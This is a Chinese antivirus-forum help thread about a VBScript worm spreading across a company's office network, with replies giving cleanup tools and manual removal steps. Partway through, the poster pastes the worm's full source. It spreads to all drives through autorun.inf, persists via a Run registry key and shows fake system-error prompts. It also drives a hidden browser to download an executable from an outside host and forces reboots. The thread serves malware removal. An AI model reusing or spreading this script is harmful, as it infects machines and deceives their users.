瑞星卡卡安全论坛

最近公司内网，大部份电脑都会弹出系统信息，如下图：（不定时弹出）点确定后，又后自动弹出此对话框，当点击“确定”多几次后，就会提示“系统出现问题，需要重启。请保存相关文件，并选择“确定”立即重启计算机。”如此反复。
（图）

打开进程管理器，如图：
（）

并且进程里会自动多一个“iexplor.exe”
（图）

打开注册表
“HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\windows\CurrentVersion\Run”里面会多一个msconfig的项值。
（图）




每次在注册表反这一项删除了，可是没过久，又或者下次重开电脑的时候，又会自动生成。
但搜索C:\Windows\System32\Msconfig.vbs此文件，又搜索不到，用SymantecClient Security在安全模式杀毒，没有发现病毒，用360卫士也同样处理不到。

由于公司电脑数较多，一时间不可以都把电脑重装系统，所以在这想请各位兄弟，高手，朋友帮忙。谢谢了。

:kaka3:  很像“暴风一号”

自己参考一下这个帖子：http://bbs.ikaka.com/showtopic-8691015.aspx

还有问题就在跟帖说明

我有参考“暴风一号”的查杀方法，但都没起作用，很郁闷了。
以下是msconfig.vbs的代码，我是在Dos里提取的，看看你们有没有办法帮我解决这问题，谢谢了。
on error resume next
n1="scr":n2="I":n3="ptinG.fIl":n4=chr(101):n5="sySte":n6="m":n7="objEc":n8=chr(8
4)
Set a=CreateObject(n1 + n2 & n3 & n4 & n5 & n6 & n7 & n8):Set yy=CreateObject("w
script.shell")
Set kk=a.getfile(WScript.ScriptFullName)
if kk<> "C:\WINDOWS\system32\msconfig.vbs" then:yy.Run Mid(kk,1,2) & "\":end if
If a.FileExists("D:\111.txt") Then
else
If a.FileExists("D:\222.txt") Then
yy.RegDelete "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\ms
config"
Set k=a.drives
For Each x In k
If x.DriveType=2 Then
Set aa=a.GetFile(x & "\autorun.inf"):aa.Attributes=0:Set bb=a.GetFile(x & "\Disk
Protect.vbs"):bb.Attributes=0
a.DeleteFile(x & "\autorun.inf"):a.deleteFile(x & "\DiskProtect.vbs")
End If
Next
Set ccc=a.GetFile("C:\WINDOWS\system32\msconfig.vbs"):ccc.Attributes=0:Set zzz=a
.GetFile("C:\WINDOWS\system32\regedit.exe"):zzz.Attributes=0
a.DeleteFile("C:\WINDOWS\system32\msconfig.vbs"):a.deleteFile("C:\WINDOWS\system
32\regedit.exe")
Else
Set c=a.GetFile(WScript.ScriptFullName)
if c<> "C:\WINDOWS\system32\msconfig.vbs" then
c.Attributes=6
Set b=a.Drives
For Each d In b
If d.DriveType=1 or d.DriveType=2 Then
If a.FileExists(d & "\DiskProtect.vbs") Then
else
a.CopyFile c,d & "\DiskProtect.vbs",TRUE
Set e=a.CreateTextFile(d & "\autorun.inf",2,true)
e.WriteLine "[autorun]":e.WriteLine "open=":e.WriteLine "shell\open=打开(&O)":e.
WriteLine "shell\open\Command=WScript.exe DiskProtect.vbs":e.WriteLine "shell\op
en\Default=1":e.WriteLine "shell\explore=资源管理器(&X)":e.WriteLine "shell\expl
ore\Command=WScript.exe DiskProtect.vbs"
e.close
set o=a.getfile(d & "\autorun.inf")
If Not o.Attributes And 1 Then:o.Attributes=o.Attributes Xor 1:End If:If Not o.A
ttributes And 2 Then:o.Attributes=o.Attributes Xor 2:End if:If Not o.Attributes
And 4 Then:o.Attributes=o.Attributes Xor 4:End If
End If
end if
next
If a.FileExists("C:\WINDOWS\system32\regedit.exe") Then
else
a.CopyFile c,"C:\WINDOWS\system32\msconfig.vbs",TRUE
set bab=a.createtextfile("C:\WINDOWS\system32\regedit.exe"):bab.write date:bab.c
lose
set aba=a.getfile("C:\WINDOWS\system32\regedit.exe"):If Not aba.Attributes And 1
Then:aba.Attributes=aba.Attributes Xor 1:End If:If Not aba.Attributes And 2 The
n:aba.Attributes=aba.Attributes Xor 2:End if:If Not aba.Attributes And 4 Then:ab
a.Attributes=aba.Attributes Xor 4:End If
Set oo=a.getFile("C:\WINDOWS\system32\msconfig.vbs"):oo.Attributes=6
end if
End If
end if
chk=yy.regread("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\
msconfig")
if chk="C:\WINDOWS\system32\msconfig.vbs" then
else
yy.regWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\msc
onfig", "C:\WINDOWS\system32\msconfig.vbs", "REG_SZ"
end if
Set objWMIService1 = GetObject("winmgmts:\\" & "." & "\root\cimv2")
Set colFileLista = objWMIService1.ExecQuery("ASSOCIATORS OF {Win32_Directory.Nam
e='C:\Program Files\Super Rabbit\MagicSet'} Where " & "ResultClass = CIM_DataFil
e")
For Each objFilea In colFileLista
If InStr(objFileb.FileName, "sriecli") Or InStr(objFileb.FileName, "iepro") Or I
nStr(objFileb.FileName, "gdiplus") Then:objFileb.Delete:End If
Next
Set colFileListb=objWMIService1.ExecQuery("ASSOCIATORS OF {Win32_Directory.Name=
'D:\Program Files\Super Rabbit\MagicSet'} Where " & "ResultClass = CIM_DataFile"
)
For Each objFileb In colFileListb
If InStr(objFileb.FileName, "sriecli") Or InStr(objFileb.FileName, "iepro") Or I
nStr(objFileb.FileName, "gdiplus") Then:objFileb.Delete:End If
Next
If a.FileExists("C:\McAfee\Rogue System Sensor\RSSensor.exe") Then
Wscript.Quit
else
set ded=a.opentextfile("C:\WINDOWS\system32\regedit.exe",1):ede=ded.readall:ded.
close
If Day(Date) Mod 2=0 and date-cdate(ede)>60 Then
WScript.Sleep rnd()*500000+50000
For i=1 To 5
Set ieA=CreateObject("InternetExplorer.Application")
ieA.Visible=false
Randomize
WScript.Sleep rnd()*130000+1000
If vbMsgBoxHelpButton=MsgBox("Windows发生错误-系统冲突，请下载更新补丁以修正此问
题。" & Chr(13) & Chr(13) & "请确定电脑己经联上网络，并按“是”自动下载此补丁程
序。", vbExclamation + vbMsgBoxHelpButton, "系统信息", "Help.hlp",1) Then
ieA.navigate "http://windowshelp.microsoft.com/Windows/zh-cn/default.mspx"
else
ieA.navigate "http://admincity.tom.com/skypetools/download/skype/0092/SkypeClien
t.exe"
End If
Next
strComputer=".":Set objWMIService = GetObject("winmgmts:" & "{impersonationLevel
=impersonate,(Shutdown)}!\\" & strComputer & "\root\cimv2"):Set colOperatingSyst
ems = objWMIService.ExecQuery("Select * from Win32_OperatingSystem")
For Each objOperatingSystem in colOperatingSystems:if vbok=MsgBox("系统出现问题
，需要重启。请保存相关文件，并选择“确定”立即重启计算机。", vbCritical + vbOKCa
ncel, "系统提示") Then:ObjOperatingSystem.Reboot():else:yy.run "C:\WINDOWS\syste
m32\winhelp.hlp":end if:Next
End If
End If
End If
'/***简单事件***/

装瑞星了嘛，使用瑞星的主动防御，应用程序控制，添加规则，监控c:\windows\system32 ，查看一下具体是哪个程序创建那个vbs。

下载这个工具：http://bbs.ikaka.com/attachment.aspx?attachmentid=486266 提取msconfig.vbs打包发送上来。

将C:\windows\system32\msconfig.vbs 文件压缩发来

然后用SRENG工具扫描系统日志发这论坛来

点击下载：SRENG工具  (内附说明）（右键选择“目标另存为”下载）本链接不支持迅雷等下载工具下载


建议日志文件以附件形式发来
点击我这贴右下角的“引用”,然后就应该知道怎么发了。

公司没有用瑞星，用的是Symantec Client Security网络版的。

此规则具体如何创建，能说详细些吗？ 谢谢

下载6楼的工具提取那个vbs打包发送上来，下载7楼工具扫描日志一并发上来。

这个跟暴风不同，暴风是写数据流的路径会有一个冒号

楼主还是先把VBS文件提取出来再说吧。按楼上版主说的做

下面的是我提取到的脚本文件，但如何知道，这些脚本文件，是由那些应该程序产生的呢？


附件: 备份文件夹.rar

附件: 单个隐藏文件提取处理器.rar

日志呢？？

光顾找文件了

下载附件，扫描清理

提示重启电脑，就立即重启电脑

附件: AntiFldVir.rar (2010-3-19 16:53:48, 16.07 K)
该附件被下载次数 175

好的，还真忘了扫描了。

谢谢哥们的热心帮助，我尽快把日志上传上来。

系统中毒了，然后病毒脚本给干掉了
开始-运行 输入MSCONFIG，选启动，把msconfig上的这个勾去掉

在Msconfig启动项里，早已把msconfig.vbs的勾去掉了，而且C:\windows\system32\msconfig.vbs 这个脚本文件也给删除了。但只要一打开，我的电脑磁盘（不管是右键-打开(0)、还是双击打开）在磁盘的分区根目录下，又会直接生成autorun.inf和DiskProtect.vbs两个隐藏文件。但是找C:\windows\system32\msconfig.vbs这个文件，"系统又提示找不到文件"。真郁闷，不知道是那个应用程序生成这些隐藏文件的呢？

在Msconfig启动项里，早已把msconfig.vbs的勾去掉了，而且C:\windows\system32\msconfig.vbs 这个脚本文件也给删除了。但只要一打开，我的电脑磁盘（不管是右键-打开(0)、还是双击打开）在磁盘的分区根目录下，又会直接生成autorun.inf和DiskProtect.vbs两个隐藏文件。但是找C:\windows\system32\msconfig.vbs这个文件，"系统又提示找不到文件"。真郁闷，不知道是那个应用程序生成这些隐藏文件的呢？                                       

networkedition能告诉我，如何使用瑞星的主动防御，应用程序控制，添加规则，监控c:\windows\system32，查看一下具体是哪个程序创建那个vbs呢？

谢谢！

附件: 备份文件夹.rar

我在14楼的那附件，你做了没有？？

你的SRENG日志呢？？？

你先下载14楼，天月的工具进行扫描清理

然后在用SRE工具扫描日志上来（以附件的形式上传）

你这个备份文件夹已经发过了

使用瑞星的主动防御方法：
打开杀毒软件点击【设置】——【详细设置】——【电脑防护】——【应用程序控制】
添加规则，监控c:\windows\system32

:kaka3: 兄弟们，我来了。
我按你们的方法，用SRE工具扫描，可是没有产生日志文件。而且也没有任何的异常。可是脚本病毒仍存在。
1、C:\windows\system32\msconfig.vbs
2、C:\autorun.inf
3、C:\diskprotect.vbs
4、D:\autorun.inf
5、D:\diskprotect.vbs
.................
这些脚本文件，到底是哪个应用程序产生的呢？而且我还发现，只要用右建--打开(0)或者是用资源管理器(X)打开磁盘分区，就会自动在每个分区的根目录产生autorun.inf、diskprotect.vbs两个文件。而且diskprotect.vbs的内容和C:\windows\system32\msconfig.vbs的内容是一模一样的。
      有没有朋友遇到这样的问题。谢谢

需要通过日志来分析。
SRENG工具的各项操作看这里：
http://bbs.ikaka.com/showtopic-8545446.aspx
将日志打包发送上来。

C:\WINDOWS\system32\msconfig.vbs
C:\WINDOWS\system32\regedit.exe
C:\autorun.inf
C:\DiskProtect.vbs
D:\DiskProtect.vbs
D:\autorun.inf
E:\DiskProtect.vbs
E:\autorun.inf
上面文件用XDelBox一次性删除
(http://enao.ys168.com 下载)
复制上面所有要删除的文件，打开XDelBox,在待删除列表点 右键==>选择 剪贴版导入不检查路径==>勾选上 抑制再生==>点 右键==>选择==>立刻重启执行删除

删除注册项目
"msconfig"="C:\\WINDOWS\\system32\\msconfig.vbs"

C:\WINDOWS\system32\regedit.exe是个文件文件，里面的内容是日期。
我处理了这几个文件，没发现复发。

大哥，C:\WINDOWS\system32\regedit.exe是个文件文件，里面的内容是日期
    这什么意思？Regedit.exe 这个不是注册表来的吗？ 打开里边怎么会是日期的内容呢？
请问你也遇到这种情况吗？

用SRE工具扫描，可是没有产生日志文件:kaka2:

那我13楼上传的附件，你下载做了没有呢？？

此毒并不难杀。


楼主说的反复中毒可能是局域网内电脑之间相互传播病毒所致。中毒电脑须脱网。杀净病毒、打上该打的补丁，然后再上网。


运行了你提供的样本msconfig.vbs，


手工杀毒流程如下：




1.删除病毒文件





2.删除启动项：

正常的“注册表编辑器“regedit.exe在windows目录下。C:\WINDOWS\system32\regedit.exe不是注册表编辑器，是病毒创建的。